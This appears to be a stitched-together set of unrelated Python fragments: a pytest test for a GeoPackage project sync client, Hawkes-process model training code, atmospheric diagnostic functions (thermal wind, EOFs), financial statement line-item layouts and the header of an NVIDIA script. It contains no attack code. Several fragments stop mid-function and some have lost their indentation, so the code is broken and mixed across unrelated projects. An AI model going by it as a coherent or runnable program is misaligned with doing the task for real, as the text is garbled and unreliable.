@pytest.mark.parametrize("extra_connection", [False, True])
def test_rebase_success(mc, extra_connection):
    """
    Checks whether a pull with successful rebase is handled correctly.
    i.e. changes are merged together and no conflict files are created.
    """
    test_project = 'test_rebase_success'
    if extra_connection:
        test_project += '_extra_conn'
    project = API_USER + '/' + test_project
    project_dir = os.path.join(TMP_DIR, test_project)  # primary project dir
    project_dir_2 = os.path.join(TMP_DIR, test_project+'_2')  # concurrent project dir
    test_gpkg = os.path.join(project_dir, 'test.gpkg')
    test_gpkg_2 = os.path.join(project_dir_2, 'test.gpkg')
    test_gpkg_basefile = os.path.join(project_dir, '.mergin', 'test.gpkg')
    test_gpkg_conflict = conflicted_copy_file_name(test_gpkg, API_USER, 1)
    cleanup(mc, project, [project_dir, project_dir_2])
    os.makedirs(project_dir)
    shutil.copy(os.path.join(TEST_DATA_DIR, 'base.gpkg'), test_gpkg)
    _use_wal(test_gpkg)  # make sure we use WAL, that's the more common and more difficult scenario
    mc.create_project_and_push(test_project, project_dir)
    # Download project to the concurrent dir + add a row + push a new version
    mc.download_project(project, project_dir_2)
    shutil.copy(os.path.join(TEST_DATA_DIR, 'inserted_1_A.gpkg'), test_gpkg_2)
    # fix: enable WAL on the concurrent copy — previously this was wrongly
    # applied to `test_gpkg` again, so `test_gpkg_2` never used WAL
    _use_wal(test_gpkg_2)
    mc.push_project(project_dir_2)
    # do changes in the local DB (added a row)
    shutil.copy(os.path.join(TEST_DATA_DIR, 'inserted_1_B.gpkg'), test_gpkg)
    _use_wal(test_gpkg)  # make sure we use WAL
    if extra_connection:
        # open a connection and keep it open (qgis does this with a pool of connections too)
        con_extra = sqlite3.connect(test_gpkg)
        cursor_extra = con_extra.cursor()
        cursor_extra.execute('select count(*) from simple;')
    pull_changes, push_changes, _ = mc.project_status(project_dir)
    assert _is_file_updated('test.gpkg', pull_changes)
    assert _is_file_updated('test.gpkg', push_changes)
    assert not os.path.exists(test_gpkg_conflict)
    mc.pull_project(project_dir)
    assert not os.path.exists(test_gpkg_conflict)
    # rebase succeeded: the local file contains both the remote and the local new row,
    # while the basefile (server version) only has the remote one
    assert _get_table_row_count(test_gpkg, 'simple') == 5
    assert _get_table_row_count(test_gpkg_basefile, 'simple') == 4
def test_conflict_file_names():
"""
Test generation of file names for conflicts files.
"""
data = [
('/home/test/geo.gpkg', 'jack', 10, '/home/test/geo (conflicted copy, jack v10).gpkg'),
('/home/test/g.pkg', 'j', 0, '/home/test/g (conflicted copy, j v0).pkg'),
('home/test/geo.gpkg', 'jack', 10, 'home/test/geo (conflicted copy, jack v10).gpkg'),
('geo.gpkg', 'jack', 10, 'geo (conflicted copy, jack v10).gpkg'),
('/home/../geo.gpkg', 'jack', 10, '/geo (conflicted copy, jack v10).gpkg'),
('/home/./geo.gpkg', 'jack', 10, '/home/geo (conflicted copy, jack v10).gpkg'),
('/home/test/geo.gpkg', '', 10, '/home/test/geo (conflicted copy, v10).gpkg'),
('/home/test/geo.gpkg', 'jack', -1, '/home/test/geo (conflicted copy, jack v-1).gpkg'),
('/home/test/geo.tar.gz', 'jack', 100, '/home/test/geo (conflicted copy, jack v100).tar.gz'),
('', 'jack', 1, '' )
]
for i in data:
file_name = conflicted_copy_file_name(i[0], i[1], i[2])
assert file_name == i[3]
data = [
('/home/test/geo.json', 'jack', 10, '/home/test/geo (edit conflict, jack v10).json'),
('/home/test/g.jsn', 'j', 0, '/home/test/g (edit conflict, j | |
"""
BSD 3-Clause License
Copyright (c) 2020, Cyber Security Research Centre Limited
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from tick.hawkes import SimuHawkesExpKernels, SimuHawkesMulti, HawkesExpKern, SimuHawkes, HawkesEM, HawkesKernelTimeFunc, HawkesBasisKernels
from tick.plot import plot_hawkes_kernels, plot_point_process
import numpy as np
import matplotlib.pyplot as plt
from HelperFunctions import ConcatClusters, ComputeClusterLengths
from tick_goodness_of_fit import plot_resid, goodness_of_fit_par
from scipy import integrate
import math
#Contains various functions used to train or simulate models related to Hawkes processes.
#Some may be broken, but the ones used in the notebooks work.
#TrainInnerClusterExp takes a list of inner-cluster timestamps and
#attempts to train an exponential-kernel model able to produce more clusters.
def TrainInnerClusterExp(clusters, num_decays=2000, decay_low=-10, decay_high=10):
    """
    Grid-search the decay of a 2D exponential-kernel Hawkes learner over the
    concatenated cluster timestamps and return the best scoring fit.

    Parameters
    ----------
    clusters : list
        Inner-cluster timestamp data; concatenated into one stream for fitting.
    num_decays : int, optional
        Number of log-spaced decay candidates to try.
    decay_low, decay_high : int, optional
        Base-10 exponents bounding the decay search range.

    Returns
    -------
    (best_learner, best_decay) : tuple
        The highest scoring fitted ``HawkesExpKern`` and the decay it used.

    Raises
    ------
    RuntimeError
        If no decay candidate produced a usable fit (previously this path
        crashed with a NameError on `best_learner`).
    """
    data = ConcatClusters(clusters, 0)

    best_score = -1e100
    best_learner = None
    best_decay = None

    decay_candidates = np.logspace(decay_low, decay_high, num_decays, dtype=np.dtype('d'))
    print(f"Training on {len(clusters)} clusters")
    print(f"Decay Range: {decay_candidates[0]} -> {decay_candidates[-1]}")
    score_list = np.zeros(num_decays)

    float_errors = 0
    baseline_errors = 0
    for i, decay in enumerate(decay_candidates):
        # same decay for every entry of the 2x2 kernel matrix
        decay = decay * np.ones((2, 2))
        try:
            # Only small decay values tend to make sense here: large ones let the
            # process get too excited and decay too slowly.
            learner = HawkesExpKern(decay, penalty='l2', C=1000, max_iter=1000, solver='agd', tol=1e-3)
            learner.fit(data, start=learner.coeffs)
            hawkes_score = learner.score()

            # Reject fits whose baseline is entirely zero — they can never
            # generate events on their own.
            if not any(b > 0 for b in learner.baseline):
                baseline_errors += 1
                continue

            # record the score for plotting, and keep track of the best fit
            score_list[i] = hawkes_score
            if hawkes_score > best_score:
                best_score = hawkes_score
                best_learner = learner
                best_decay = decay
        except ZeroDivisionError:
            # tick occasionally divides by zero for unlucky decay values
            float_errors += 1
            continue

    # score plot over the decay grid
    plt.plot(decay_candidates, score_list)
    plt.xscale('log')
    plt.yscale('log')
    plt.title('decay Scores')
    plt.grid(True)
    plt.show()

    print(f"\nTraining Done")
    print(f"Float Errors: {float_errors} ({100/num_decays*float_errors}%)")
    print(f"Baseline Errors: {baseline_errors} ({100/num_decays*baseline_errors}%)")
    print(f"==========\nSuccessful Results: {num_decays - float_errors - baseline_errors} ({100/num_decays*(num_decays - float_errors - baseline_errors)}%)\n==========\n")

    if best_learner is None:
        raise RuntimeError('no decay candidate produced a usable fit')

    print(f"\nBest Score: {best_score}")
    print(f"Best Decay: {best_decay}")
    plot_hawkes_kernels(best_learner)
    print(f"Adjacency: {best_learner.adjacency}")
    print(f"Baseline: {best_learner.baseline}")
    print(f"Coeffs: {best_learner.coeffs}")
    return best_learner, best_decay
def TrainSeriesExp(series, num_decays=2000, decay_low=-10, decay_high=10):
    """
    Grid-search the decay of an exponential-kernel Hawkes learner on a single
    realisation and return the best scoring fit.

    Parameters
    ----------
    series : list
        Per-node timestamp arrays of one realisation (passed to ``fit`` as ``[series]``).
    num_decays : int, optional
        Number of log-spaced decay candidates to try.
    decay_low, decay_high : int, optional
        Base-10 exponents bounding the decay search range.

    Returns
    -------
    (best_learner, best_decay) : tuple
        The highest scoring fitted ``HawkesExpKern`` and the decay it used.

    Raises
    ------
    RuntimeError
        If no decay candidate produced a usable fit (previously this path
        crashed with a NameError on `best_learner`).
    """
    best_score = -1e100
    best_learner = None
    best_decay = None

    decay_candidates = np.logspace(decay_low, decay_high, num_decays, dtype=np.dtype('d'))
    print(f"Decay Range: {decay_candidates[0]} -> {decay_candidates[-1]}")
    score_list = np.zeros(num_decays)

    float_errors = 0
    baseline_errors = 0
    for i, decay in enumerate(decay_candidates):
        try:
            # a single scalar decay; see TrainInnerClusterExp for the 2x2 variant
            learner = HawkesExpKern(decay, penalty='l2', C=1e-3, max_iter=1000, solver='agd', tol=1e-5)
            learner.fit([series])
            hawkes_score = learner.score()

            # Reject fits whose baseline is entirely zero — they can never
            # generate events on their own.
            if not any(b > 0 for b in learner.baseline):
                baseline_errors += 1
                continue

            # record the score for plotting, and keep track of the best fit
            score_list[i] = hawkes_score
            if hawkes_score > best_score:
                best_score = hawkes_score
                best_learner = learner
                best_decay = decay
        except ZeroDivisionError:
            # tick occasionally divides by zero for unlucky decay values
            float_errors += 1
            continue

    # score plot over the decay grid
    plt.plot(decay_candidates, score_list)
    plt.xscale('log')
    plt.yscale('log')
    plt.title('decay Scores')
    plt.grid(True)
    plt.show()

    print(f"\nTraining Done")
    print(f"Float Errors: {float_errors} ({100/num_decays*float_errors}%)")
    print(f"Baseline Errors: {baseline_errors} ({100/num_decays*baseline_errors}%)")
    print(f"==========\nSuccessful Results: {num_decays - float_errors - baseline_errors} ({100/num_decays*(num_decays - float_errors - baseline_errors)}%)\n==========\n")

    if best_learner is None:
        raise RuntimeError('no decay candidate produced a usable fit')

    print(f"\nBest Score: {best_score}")
    print(f"Best Decay: {best_decay}")
    plot_hawkes_kernels(best_learner)
    print(f"Adjacency: {best_learner.adjacency}")
    print(f"Baseline: {best_learner.baseline}")
    print(f"Coeffs: {best_learner.coeffs}")
    return best_learner, best_decay
#careful, setting the time to be too high will eat up all available memory
def SimulateExp(baseline, adjacency, decays, time):
    """
    Simulate an exponential-kernel Hawkes process up to `time`.

    Parameters
    ----------
    baseline, adjacency, decays
        Parameters forwarded to ``SimuHawkesExpKernels``.
    time : float
        Simulation end time.

    Returns
    -------
    list
        Per-node event timestamp arrays from the simulation.
    """
    hawkes = SimuHawkesExpKernels(adjacency=adjacency, decays=decays, baseline=baseline, verbose=False)
    hawkes.end_time = time
    # note: intensity tracking (hawkes.track_intensity(dt)) is intentionally off;
    # tracking at fine granularity is what exhausts memory for long simulations
    print(f"Starting sim")
    hawkes.simulate()
    total_events = sum(len(series) for series in hawkes.timestamps)
    print(f"Simulated {total_events} points")
    return hawkes.timestamps
def TrainInnerClusterEM(clusters, k_time = 1, k_size = 100):
    """
    Fit a non-parametric (EM) Hawkes kernel to the concatenated cluster timestamps.

    Parameters
    ----------
    clusters : list
        Inner-cluster timestamp data; concatenated into one stream for fitting.
    k_time : float, optional
        Kernel support passed to ``HawkesEM`` (time span covered by the kernel).
    k_size : int, optional
        Kernel size passed to ``HawkesEM`` (number of discretization steps).

    Returns
    -------
    HawkesEM
        The fitted EM learner.
    """
    #merge all the clusters, the learner seems to only be able to fit a single long datastream
    # NOTE(review): num_clusters is unused now that the per-cluster loop below is commented out
    num_clusters = len(clusters)
    data = ConcatClusters(clusters, 0)
    #kernel size is the granularity
    #kernel support is something... (is it the size of each step?)
    em_learner = HawkesEM(kernel_support=k_time, kernel_size=k_size, n_threads=8, verbose=True, tol=1e-5, max_iter=1000)
    em_learner.fit(data)
    """#train the em learner on each cluster
    cluster_num = 0
    for cluster in clusters:
        if (cluster_num % 10 == 0):
            #print out training progress
            s = f"Cluster: {cluster_num}/{num_clusters}"
            print(f"\r{' '*l}\r", end='')
            print(f"Cluster: {cluster_num}/{num_clusters}", end='', flush=True)
            l = len(s)
        print(em_learner.baseline)
        print(em_learner.kernel)
        print("==========")
        if (cluster_num == 0):
            em_learner.fit(cluster)
        else:
            em_learner.fit(cluster, baseline_start=em_learner.baseline, kernel_start=em_learner.kernel)
        cluster_num += 1"""
    #maybe add variation in kernel sie later?
    #use em_learner.score() to evaluate goodness
    print(f"\nEM Score: {em_learner.score()}")
    fig = plot_hawkes_kernels(em_learner) #TODO, remove this?
    # NOTE(review): everything below builds normalized time-func kernels (t, m,
    # spectral_radius, k) but is currently dead code — the function returns the raw
    # learner instead (see the commented-out `return k, ...` at the bottom). Confirm
    # which return is intended before removing.
    t = np.linspace(0, k_time, endpoint=False, num=k_size)
    m = []
    for i in range(2):
        for j in range(2):
            m.append(max(em_learner.kernel[i][j]))
    #normalise to make a proper hawkes process
    spectral_radius = max(m)
    if (spectral_radius < 1):
        spectral_radius = 1
    #create a 2x2 array of time func kernels
    k = [[],[]]
    for i in range(2):
        for j in range(2):
            k[i].append(HawkesKernelTimeFunc(t_values=t, y_values=em_learner.kernel[i][j]/np.linalg.norm(em_learner.kernel[i][j])))
    #return k, em_learner.baseline #the kernel, baseline
    return em_learner
def SimulateEM(kernel, baseline, time=600):
sim_em = SimuHawkes(kernels=kernel, baseline=baseline, verbose=False, end_time=time)
dt = 0.001 #millisecond | |
Examples
--------
>>> gh = xr.DataArray(np.random.normal(size=(3,4,4)),
... coords=[('level', [400, 500, 600]), ('lat', np.arange(-90,90,45)),
... ('lon', np.arange(0,360,90))])
>>> doppyo.diagnostic.thermal_wind(gh, plevel_lower=400, plevel_upper=600)
<xarray.Dataset>
Dimensions: (lat: 4, lon: 4)
Coordinates:
level float64 500.0
* lon (lon) int64 0 90 180 270
* lat (lat) int64 -90 -45 0 45
Data variables:
u_tw (lon, lat) float64 0.003727 0.0006837 inf ... inf -0.0001238
v_tw (lat, lon) float64 4.515e+12 -1.443e+12 ... -0.000569 -0.0002777
Limitations
-----------
All input array coordinates must follow standard naming (see doppyo.utils.get_lat_name(),
doppyo.utils.get_lon_name(), etc)
Pressure levels must be provided in units of hPa
"""
degtorad = utils.constants().pi / 180
if lat_name is None:
lat_name = utils.get_lat_name(gh)
if lon_name is None:
lon_name = utils.get_lon_name(gh)
if plevel_name is None:
plevel_name = utils.get_plevel_name(gh)
# Compute the thickness -----
upper = gh.sel({plevel_name : plevel_lower})
upper[plevel_name] = (plevel_lower + plevel_upper) / 2
lower = gh.sel({plevel_name : plevel_upper})
lower[plevel_name] = (plevel_lower + plevel_upper) / 2
thickness = upper - lower
# Compute the gradient -----
x, y = utils.xy_from_lonlat(gh[lon_name], gh[lat_name])
u_tmp = utils.differentiate_wrt(thickness, dim=lon_name, x=x)
v_tmp = utils.differentiate_wrt(thickness, dim=lat_name, x=y)
# Or use windspharm -----
# w = wsh.xarray.VectorWind(thickness, thickness)
# u_tmp, v_tmp = w.gradient(thickness)
# k x (u_tw,v_tw) -> (-v_tw, u_tw) -----
u_tw = -v_tmp / (2 * utils.constants().Omega * xr.ufuncs.sin(thickness[lat_name] * degtorad))
v_tw = u_tmp / (2 * utils.constants().Omega * xr.ufuncs.sin(thickness[lat_name] * degtorad))
# Combine into dataset -----
tw = u_tw.to_dataset(name='u_tw')
tw['v_tw'] = v_tw
return tw
# ===================================================================================================
def eofs(da, sample_dim='time', weight=None, n_modes=20):
    """
    Returns the empirical orthogonal functions (EOFs), and associated principal component
    timeseries (PCs), and explained variances of provided array. Follows notation used in
    "<NAME>. and <NAME>. 1997 A Manual for EOF and SVD analyses of Climatic Data",
    whereby,
    (phi, sqrt_lambdas, EOFs) = svd(data) and PCs = phi * sqrt_lambdas

    Parameters
    ----------
    da : xarray DataArray or sequence of xarray DataArrays
        Array to use to compute EOFs. When input array is a list of xarray objects, returns the
        joint EOFs associated with each object. In this case, all xarray objects in da must have
        sample_dim dimensions of equal length.
    sample_dim : str, optional
        EOFs sample dimension
    weight : xarray DataArray or sequence of xarray DataArrays, optional
        Weighting to apply prior to svd. If weight=None, cos(lat)^2 weighting are used. If weight
        is specified, it must be the same length as da with each element broadcastable onto each
        element of da
    n_modes : values, optional
        Number of EOF modes to return

    Returns
    -------
    eofs : xarray Dataset
        Dataset containing the following variables:
        EOFs; array containing the empirical orthogonal functions
        PCs; array containing the associated principal component timeseries
        lambdas; array containing the eigenvalues of the covariance of the input data
        explained_var; array containing the fraction of the total variance explained by each EOF
        mode

    Limitations
    -----------
    This function is a wrapper on scipy.sparse.linalg.svds which is a naive implementation
    using ARPACK. Thus, the approach implemented here is non-lazy and could incur large
    increases in memory usage.
    """
    if isinstance(da, xr.core.dataarray.DataArray):
        da = [da]
    if isinstance(weight, xr.core.dataarray.DataArray):
        weight = [weight]

    # Apply weights -----
    if weight is None:
        degtorad = utils.constants().pi / 180
        weight = [xr.ufuncs.cos(da[idx][utils.get_lat_name(da[idx])] * degtorad) ** 0.5
                  for idx in range(len(da))]
    if len(weight) != len(da):
        raise ValueError('da and weight must be of equal length')
    da = [weight[idx].fillna(0) * da[idx] for idx in range(len(da))]

    # Stack along everything but the sample dimension -----
    sensor_dims = [utils.get_other_dims(d, sample_dim) for d in da]
    da = [d.stack(sensor_dim=sensor_dims[idx])
           .transpose(*[sample_dim, 'sensor_dim']) for idx, d in enumerate(da)]
    sensor_segs = np.cumsum([0] + [len(d.sensor_dim) for d in da])

    # Load and concatenate each object in da -----
    try:
        data = np.concatenate(da, axis=1)
    except ValueError:
        raise ValueError('sample_dim must be equal length for all data in da')

    # First dimension must be sample dimension -----
    phi, sqrt_lambdas, eofs = linalg.svds(data, k=n_modes)
    pcs = phi * sqrt_lambdas
    lambdas = sqrt_lambdas ** 2

    # n_modes largest modes are ordered from smallest to largest -----
    pcs = np.flip(pcs, axis=1)
    lambdas = np.flip(lambdas, axis=0)
    eofs = np.flip(eofs, axis=0)

    # Total variance: trace(data @ data.T) equals the sum of squared elements
    # (Frobenius norm squared). Computing it directly avoids materializing a
    # full (n_samples x n_samples) matrix just to take its trace -----
    sum_of_lambdas = np.sum(data * data)

    # Restructure back into xarray object -----
    dims_eof = ['mode', 'sensor_dim']
    dims_pc = [sample_dim, 'mode']
    dims_lambda = ['mode']
    EOF = []
    for idx in range(len(sensor_segs)-1):
        data_vars = {'EOFs' : (tuple(dims_eof), eofs[:, sensor_segs[idx]:sensor_segs[idx+1]]),
                     'PCs' : (tuple(dims_pc), pcs),
                     'lambdas' : (tuple(dims_lambda), lambdas),
                     'explained_var' : (tuple(dims_lambda), lambdas / sum_of_lambdas)}
        coords = dict(da[idx].coords.items())
        coords['mode'] = np.arange(1, n_modes+1)
        EOF.append(xr.Dataset(data_vars,coords).unstack('sensor_dim'))
    if len(EOF) == 1:
        return EOF[0]
    else:
        return EOF
# ===================================================================================================
def mean_merid_mass_streamfunction(v, lat_name=None, lon_name=None, plevel_name=None):
    """
    Return the mean meridional mass stream function, averaged over all provided longitudes.

    Parameters
    ----------
    v : xarray DataArray
        Fields of meridional velocity with at least latitude, longitude and pressure-level
        coordinates (standard naming, see Limitations)
    lat_name : str, optional
        Name of the latitude coordinate; determined automatically when None
    lon_name : str, optional
        Name of the longitude coordinate; determined automatically when None
    plevel_name : str, optional
        Name of the pressure-level coordinate; determined automatically when None

    Returns
    -------
    mmms : xarray DataArray
        The mean meridional mass stream function

    Limitations
    -----------
    Coordinates must follow standard naming (see doppyo.utils.get_lat_name(),
    doppyo.utils.get_lon_name(), etc). Pressure levels must be provided in hPa.
    """
    degtorad = utils.constants().pi / 180

    # Resolve any coordinate names that were not given explicitly.
    lat_name = utils.get_lat_name(v) if lat_name is None else lat_name
    lon_name = utils.get_lon_name(v) if lon_name is None else lon_name
    plevel_name = utils.get_plevel_name(v) if plevel_name is None else plevel_name

    cos_lat = xr.ufuncs.cos(v[lat_name] * degtorad)
    v_zonal_mean = v.mean(dim=lon_name)

    # Convert hPa -> Pa for the cumulative integral over pressure.
    pressure_pa = v_zonal_mean[plevel_name] * 100
    mass_flux = utils.integrate(v_zonal_mean, over_dim=plevel_name, x=pressure_pa,
                                cumulative=True)

    return (2 * utils.constants().pi * utils.constants().R_earth * cos_lat *
            mass_flux / utils.constants().g).rename('mmms')
# ===================================================================================================
def atmos_energy_cycle(temp, u, v, omega, gh, terms=None, vgradz=False, spectral=False, n_wavenumbers=20,
integrate=True, lat_name=None, lon_name=None, plevel_name=None):
"""
Returns all terms in the Lorenz energy cycle. Follows formulae and notation used in `Marques
et al. 2011 Global diagnostic energetics of five state-of-the-art climate models. Climate
Dynamics`. Note that this decomposition is in the space domain. A space-time decomposition
can also be carried out (though not in Fourier space, but this is not implemented here (see
`Oort. 1964 On Estimates of the atmospheric energy cycle. Monthly Weather Review`).
Author: <NAME>
Date: 15/07/2018
Parameters
----------
temp : xarray DataArray
Array containing fields of temperature with at least coordinates latitude, longitude
and level (following standard naming - see Limitations)
u : xarray DataArray
Array containing fields of zonal velocity with at least coordinates latitude, longitude
and level (following standard naming - see Limitations)
v : xarray DataArray
| |
from base_classes import *
class income_statement(financial_statement):
    ''' __init__ will create the necessary accounts for an income statement.
    --------------------------------------------------------------------------
    No data must be added initially, use function add_data for this '''

    # Statement layout as (tid, label, display_order, parent_tid) rows.
    # Rows are ordered top-down so that every parent line item has been
    # created before any of its children reference it.  Leading spaces in
    # the labels encode the display indentation and are significant.
    _LAYOUT = (
        # Final line of the income statement
        (58, 'Net Income Available to Common Shareholders', 57, None),
        # Net income & final adjustments
        (55, 'Net Income', 54, 58),
        (56, 'Preferred Dividends', 55, 58),
        (57, 'Other Adjustments', 56, 58),
        # Factoring in minority interest
        (53, 'Income (Loss) Including Minority Interest', 52, 55),
        (54, 'Minority Interest', 53, 55),
        # Extraordinary items
        (50, 'Net Extraordinary Gains (Losses)', 49, 53),
        (51, ' Discontinued Operations', 50, 50),
        (52, ' XO & Accounting Charges & Other', 51, 50),
        # Income after taxes
        (49, 'Income (Loss) from Continuing Operations', 48, 53),
        (48, 'Income (Loss) from Affiliates, net of taxes', 47, 49),
        # Pre-tax income
        (43, 'Pretax Income (Loss)', 42, 49),
        (28, 'Pretax Income (Loss), Adjusted', 27, 43),
        # Tax expense
        (44, 'Income Tax (Expense) Benefit, net', 43, 49),
        (45, ' Current Income Tax', 44, 44),
        (46, ' Deferred Income Tax', 45, 44),
        (47, ' Tax Allowance/Credit', 46, 44),
        # Abnormal activities & children
        (29, 'Abnormal Gains (Losses)', 28, 43),
        (30, ' Acquired In-Process R&D', 29, 29),
        (31, ' Merger / Acquisition Expense', 30, 29),
        (32, ' Abnormal Derivatives', 31, 29),
        (33, ' Disposal of Assets', 32, 29),
        (34, ' Early extinguishment of Debt', 33, 29),
        (35, ' Asset Write-Down', 34, 29),
        (36, ' Impairment of Goodwill & Intangibles', 35, 29),
        (37, ' Sale of Business', 36, 29),
        (38, ' Legal Settlement', 37, 29),
        (39, ' Restructuring Charges', 38, 29),
        (40, ' Sale of and Unrealized Investments', 39, 29),
        (41, ' Insurance Settlement', 40, 29),
        (42, ' Other Abnormal Items', 41, 29),
        # Non-operating activities
        (20, 'Non-Operating Income (Loss)', 19, 28),
        (21, ' Interest Expense, net', 20, 20),
        (22, ' Interest Expense', 21, 21),
        (23, ' Interest Income', 22, 21),
        (24, ' Other Investment Income (Loss)', 23, 20),
        (25, ' Foreign Exchange Gain (Loss)', 24, 20),
        (26, ' Income (Loss) from Affiliates', 25, 20),
        (27, ' Other Non-Operating Income (Loss)', 26, 20),
        # Operating income
        (19, 'Operating Income (Loss)', 18, 28),
        (10, ' Other Operating Income', 9, 19),
        # Operating expenses & children
        (11, 'Operating Expenses', 10, 19),
        (12, ' Selling, General & Administrative', 11, 11),
        (13, ' Selling & Marketing', 12, 12),
        (14, ' General & Administrative', 13, 12),
        (15, ' Research & Development', 14, 11),
        (16, ' Depreciation & Amortization', 15, 11),
        (17, ' Provision For Doubtful Accounts', 16, 11),
        (18, ' Other Operating Expense', 17, 11),
        # Gross profit
        (4, 'Gross Profit', 8, 19),
        # Cost of sales & children
        (2, 'Cost of revenue', 4, 4),
        (7, ' Cost of Goods & Services', 5, 2),
        (8, ' Cost of Financing Revenue', 6, 2),
        (9, ' Cost of Other Revenue', 7, 2),
        # Revenue & children
        (1, 'Revenue', 0, 4),
        (3, ' Sales & Services Revenue', 1, 1),
        (5, ' Financing Revenue', 2, 1),
        (6, ' Other Revenue', 3, 1),
    )

    def __init__(self, data=None):
        # Materialize each row as an is_tid_<n> attribute, wiring children
        # to the already-created parent line items.
        for tid, label, order, parent_tid in self._LAYOUT:
            if parent_tid is None:
                item = line_item(label, order)
            else:
                item = line_item(label, order,
                                 parent=getattr(self, 'is_tid_%d' % parent_tid))
            setattr(self, 'is_tid_%d' % tid, item)

        if data:
            self.add_data(data)
class cash_flow_statement(financial_statement):
    ''' __init__ will create the necessary accounts for a cash flow statement.
    --------------------------------------------------------------------------
    No data must be added initially, use function add_data for this '''

    # Statement layout as (tid, label, display_order, parent_tid) rows,
    # ordered so every parent exists before its children are created.
    # Labels (including leading spaces, the 'Acqusition' spelling, and the
    # missing leading space on 'Decrease in Long Term Investment') are
    # reproduced exactly as in the original data schema.
    _LAYOUT = (
        # Final line of the cash flow statement
        (46, 'Net Changes in Cash', 51, None),
        # Factoring in FX gains and losses
        (44, ' Effect of Foreign Exchange Rates', 50, 46),
        (55, 'Net Cash Before FX', 49, 46),
        # Factoring in discontinued operations
        (56, 'Net Cash Before Disc. Operations and FX', 47, 55),
        (45, ' Change in Cash from Disc. Operations and Other', 48, 55),
        # Cash from operating activities
        (13, 'Cash from Operating Activities', 15, 56),
        # Net income & children
        (1, 'Net Income/Starting Line', 0, 13),
        (47, ' Net Income', 1, 1),
        (48, ' Net Income From Discontinued Operations', 2, 1),
        (49, ' Other Adjustments', 3, 1),
        # Non-cash items & children
        (3, 'Non-Cash Items', 5, 13),
        (4, ' Stock-Based Compensation', 6, 3),
        (5, ' Deferred Income Taxes', 7, 3),
        (6, ' Other Non-Cash Adjustments', 8, 3),
        # Change in working capital & children
        (7, 'Change in Working Capital', 9, 13),
        (8, ' (Increase) Decrease in Accounts Receivable', 10, 7),
        (9, ' (Increase) Decrease in Inventories', 11, 7),
        (10, ' Increase (Decrease) in Accounts Payable', 12, 7),
        (11, ' Increase (Decrease) in Other', 13, 7),
        # Cash from operating children, other
        (12, 'Net Cash From Discontinued Operations (operating)', 14, 13),
        (2, 'Depreciation & Amortization', 4, 13),
        # Cash from investing activities
        (31, 'Cash from Investing Activities', 34, 56),
        # Fixed asset/intangibles activity and children
        (14, 'Change in Fixed Assets & Intangibles', 16, 31),
        (15, ' Disposition of Fixed Assets & Intangibles', 17, 14),
        (16, ' Disposition of Fixed Assets', 18, 15),
        (17, ' Disposition of Intangible Assets', 19, 15),
        (18, ' Acquisition of Fixed Assets & Intangibles', 20, 14),
        (19, ' Purchase of Fixed Assets', 21, 18),
        (20, ' Acquisition of Intangible Assets', 22, 18),
        (21, ' Other Change in Fixed Assets & Intangibles', 23, 14),
        # LT investment activity and children
        (22, 'Net Change in Long Term Investment', 24, 31),
        (23, 'Decrease in Long Term Investment', 25, 22),
        (24, ' Increase in Long Term Investment', 26, 22),
        # M & A activity and children
        (25, 'Net Cash From Acquisitions & Divestitures', 27, 31),
        (26, ' Net Cash from Divestitures', 28, 25),
        (27, ' Cash for Acqusition of Subsidiaries', 29, 25),
        (28, ' Cash for Joint Ventures', 30, 25),
        (50, ' Net Cash from Other Acquisitions', 31, 25),
        # Cash from investing children, other
        (29, 'Other Investing Activities', 32, 31),
        (30, 'Net Cash From Discontinued Operations (investing)', 33, 31),
        # Cash from financing activities
        (43, 'Cash from Financing Activities', 46, 56),
        # Debt financing activity and children
        (33, 'Cash From (Repayment of) Debt', 36, 43),
        (34, 'Cash From (Repayment of) Short Term Debt, net', 37, 33),
        (35, ' Cash From (Repayment of) Long Term Debt, net', 38, 33),
        (36, ' Repayments of Long Term Debt', 39, 35),
        (37, ' Cash From Long Term Debt', 40, 35),
        # Equity financing activity and children
        (38, 'Cash From (Repurchase of) Equity', 41, 43),
        (39, ' Increase in Capital Stock', 42, 38),
        (40, ' Decrease in Capital Stock', 43, 38),
        # Cash from financing children, other
        (32, 'Dividends Paid', 35, 43),
        (41, 'Other Financing Activities', 44, 43),
        (42, 'Net Cash From Discontinued Operations (financing)', 45, 43),
    )

    def __init__(self, data=None):
        # Materialize each row as a cf_tid_<n> attribute, wiring children
        # to the already-created parent line items.
        for tid, label, order, parent_tid in self._LAYOUT:
            if parent_tid is None:
                item = line_item(label, order)
            else:
                item = line_item(label, order,
                                 parent=getattr(self, 'cf_tid_%d' % parent_tid))
            setattr(self, 'cf_tid_%d' % tid, item)

        if data:
            self.add_data(data)
class balance_sheet(financial_statement):
''' __init__ will | |
<gh_stars>0
#!/usr/bin/env python3
# Copyright (c) 2018 NVIDIA Corporation. All rights reserved.
# This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.
# https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode
from __future__ import print_function
######################################################
"""
REQUIREMENTS:
simplejson==3.16.0
numpy==1.14.1
opencv_python==3.4.3.18
horovod==0.13.5
photutils==0.5
scipy==1.1.0
torch==0.4.0
pyquaternion==0.9.2
tqdm==4.25.0
pyrr==0.9.2
